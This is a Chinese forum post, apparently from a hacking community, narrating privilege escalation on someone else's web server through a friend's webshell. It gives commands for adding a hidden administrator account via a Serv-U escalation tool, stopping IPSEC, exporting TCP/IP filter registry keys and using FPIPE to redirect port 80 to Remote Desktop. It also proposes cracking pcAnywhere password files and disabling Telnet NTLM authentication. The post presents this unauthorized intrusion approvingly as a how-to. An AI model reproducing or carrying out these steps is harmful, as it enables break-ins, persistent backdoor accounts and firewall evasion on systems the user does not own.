艰难的3389
[color=Black]Sample Text[/color]一、前言今天,我用了5年的10G硬盘终于下岗了,80G的来了呵呵。一会儿就装好了系统。用新硬盘的感觉就是好。在网上瞎转的时候 朋友‘想爬树的鱼 ’和我说他有个WebShell让我帮忙提下权。想了想没有什么事情就答应了。
二、前去打探
拿到了地址,进去看了下。Webshell用的是修改过的LCX的海阳顶端。从〖Server〗显示的进程来看(图1),知道服务器安装了诺顿杀毒软件、远程控制软件Pcanywhere、还有我们喜欢的Serv-U 还是5.2的呵呵。
在往下看 看到了开着Telnet和Terminal Services(大家的最爱吧)服务(图2),这下方便了。再看看,晕!所有盘都可以访问,在试试〖Wscript.Shell〗,晕!提示:文件无法被打开,请重试(图3)。我们点"使用Wscript.shell"运行命令OK!
老大,这就是打探的情况。
小技巧:这个时候可以上传一个cmd.exe文件 在〖Wscript.Shell〗的"路径" 里边输入你上传Cmd.exe的地址.如:f:\web\cmd.exe 在试下 如果还不可以 可以试试 "Wscript.shell"
三、计划
听了探子的回报,做出了一下几个方案:
1.用Serv-u提权 加个管理员账户
2.拿Pcanywhere密码文件 破解密码 登陆
3.用SERV-U得到的系统账号来登陆3389
4.可以用Telnet来登陆 先用serv-u提权工具运行"tlntadmn config sec=-ntlm"来消除ntlm认证
四、准备作战
OK!准备的差不多了!Let's Go!!
我先上传了Serv-u的提权工具,还好没有被查杀^-^。在〖Wscript.Shell〗下用Wscript.shell运行成功 先加个用户OK! 运行net usre看看 好了!用户用了
\\ 的用户帐户
-------------------------------------------------------------------------------
Administrator Guest IUSR_VHOST-WEB-1582
IWAM_VHOST-WEB-1582 sky TsInternetUser
命令运行完毕,但发生一个或多个错误。
Sky 就是我们添加的账户。
下面的事情很简单了,我们可以用3389来连接下了。 呵呵,本以为拿下了。没有想到残酷的还在后面。3389不能连接(图4) 同样Pcanywhere不能连接 Telnet也连接不上。可是我没有找到盘里边有防火墙啊。可能是IPSEC的问题 停止它。
在SERV-U的提权工具里边输入"net stop policyagent" 好了停止了 在连接3389端口,狂晕!还是不能连接返回信息和图四一样!
那是不是Tcp/Ip筛选的问题呢?把注册表里边的内容导出来看看
回到〖Wscript.Shell〗执行cmd命令:
f:\web\ian.***.com\html\mb.exe "regedit -e f:\web\ian.***.com\html\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip" #导出注册表里关于TCP/IP筛选的第一处
f:\web\ian.***.com\html\mb.exe "regedit -e f:\web\ian.***.com\html\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip" #导出注册表里关于TCP/IP筛选的第二处
f:\web\ian.***.com\html\mb.exe "regedit -e f:\web\ian.***.com\html\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" #导出注册表里关于TCP/IP筛选的第三处
然后DOWN下来,看看没有什么问题。郁闷了IPSEC没有问题 TCP/IP筛选也没有问题 应该有防火墙或其他东西?
不过 我没有找到! 晕!好吧!你狠我也狠!用FPIPE(端口重定向)这个工具试下,如果还不可以 就睡觉去都下半夜了。
小知识:简单说下FPIPE这个工具,这个是个端口重定向工具 就是可以实现从Internet到局域网内部机器的特定端口服务的访问。比如:我在机器上执行fpipe -l 521 -s 521 -r 23 192.168.1.1
意思是将发到本机521端口的连接通过521端口被定向到了192.168.1.1的23端口上
其中 l参数是要监听的TCP端口号 s参数是从哪个端口发出重定向信息 R参数是要定向到的IP主机的端口号
也就是执行了如下过程
Pipe connected:
In: 192.168.1.2:4203 --> 192.168.1.2:521
Out: 192.168.1.2:521 --> 192.168.1.1:23
明白的差不多了吧!
还有一点重要的就是([e.s.t]haicao说的)最好不要指定 -s port因为一旦这样就只通过一个端口转发,也就是说是单线程的.
特别是在使用代理配合FPIPE来端口重定向时,一旦指定了-S PORT的参数代理就变得很慢而且根本无法代理.比如fpipe -l 521 -s 521 -r 23 192.168.1.1 这句 我们最好写成fpipe -l 521 -r 23 192.168.1.1
差不多了吧。
我们先上传这个工具 不过这个服务器从外部可以连接的端口之有80 21(21端口不可以。问我为什么看图5)最好先把IIS停止 要不会把IIS搞挂
来到Wscript.Shell 输入
f:\web\ian.****.com\html\mb.exe "f:\web\ian.*****.com\html\fpipe.exe -l 80 -r 3389 192.168.63.82"
好了 现在我们可以用3389登陆了 不过要加上端口哦比如192.168.1.1:80 我们就进去了(图6)!!! 搞定!!!此次提权就结束了.
五、来总结下吧
主要就是利用了SERV-U提权工具添加了用户 再用端口重定向软件FPIPE把发送到80端口的连接重定向到了3389这样登陆就OK! 不过要说的是 输入重定向命令之前 要把80端口停止哦!然后就可以高枕无忧的登陆3389了。
页:
[1]